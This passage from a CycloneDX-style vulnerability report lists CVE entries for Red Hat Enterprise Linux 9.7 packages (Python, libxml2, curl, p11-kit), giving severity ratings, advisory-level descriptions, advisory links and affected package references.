"urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1502", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 4.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "rocky" }, "severity": "high" } ], "cwes": [ 93 ], "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1502" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1502" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69" }, { "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed" }, { "url": "https://github.com/python/cpython/issues/146211" }, { "url": "https://github.com/python/cpython/pull/146212" }, { "url": "https://linux.oracle.com/cve/CVE-2026-1502.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502" } ], "published": "2026-04-10T18:16:40+00:00", "updated": "2026-05-10T21:16:28+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1757", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 6.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 401 ], "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1757" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7519" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1757" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757" } ], "published": "2026-02-02T13:15:58+00:00", "updated": "2026-04-22T10:16:50+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1965", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 305 ], "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\nan Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criterion must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason being that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1965" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1965" }, { "url": "https://curl.se/docs/CVE-2026-1965.html" }, { "url": "https://curl.se/docs/CVE-2026-1965.json" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965" }, { "url": "https://ubuntu.com/security/notices/USN-8084-1" }, { "url": "https://ubuntu.com/security/notices/USN-8099-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965" } ], "published": "2026-03-11T11:15:59+00:00", "updated": "2026-03-12T14:11:19+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-2100", "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 824 ], "description": "A flaw was found in p11-kit. A remote attacker could exploit this vulnerability by calling the C_DeriveKey function on a remote token with specific IBM kyber or IBM btc derive mechanism parameters set to NULL. This could lead to the RPC-client attempting to return an uninitialized value, potentially resulting in a NULL dereference or undefined behavior. This issue may cause an application level denial of service or other unpredictable system states.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-2100" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7065" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-2100" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437308" }, { "url": "https://github.com/p11-glue/p11-kit/pull/740" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2100" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-2100" } ], "published": "2026-03-26T21:17:04+00:00", "updated": "2026-04-25T02:16:01+00:00", "affects": [ { "ref": "pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.25.3-3.el9_5", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.25.3-3.el9_5", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": 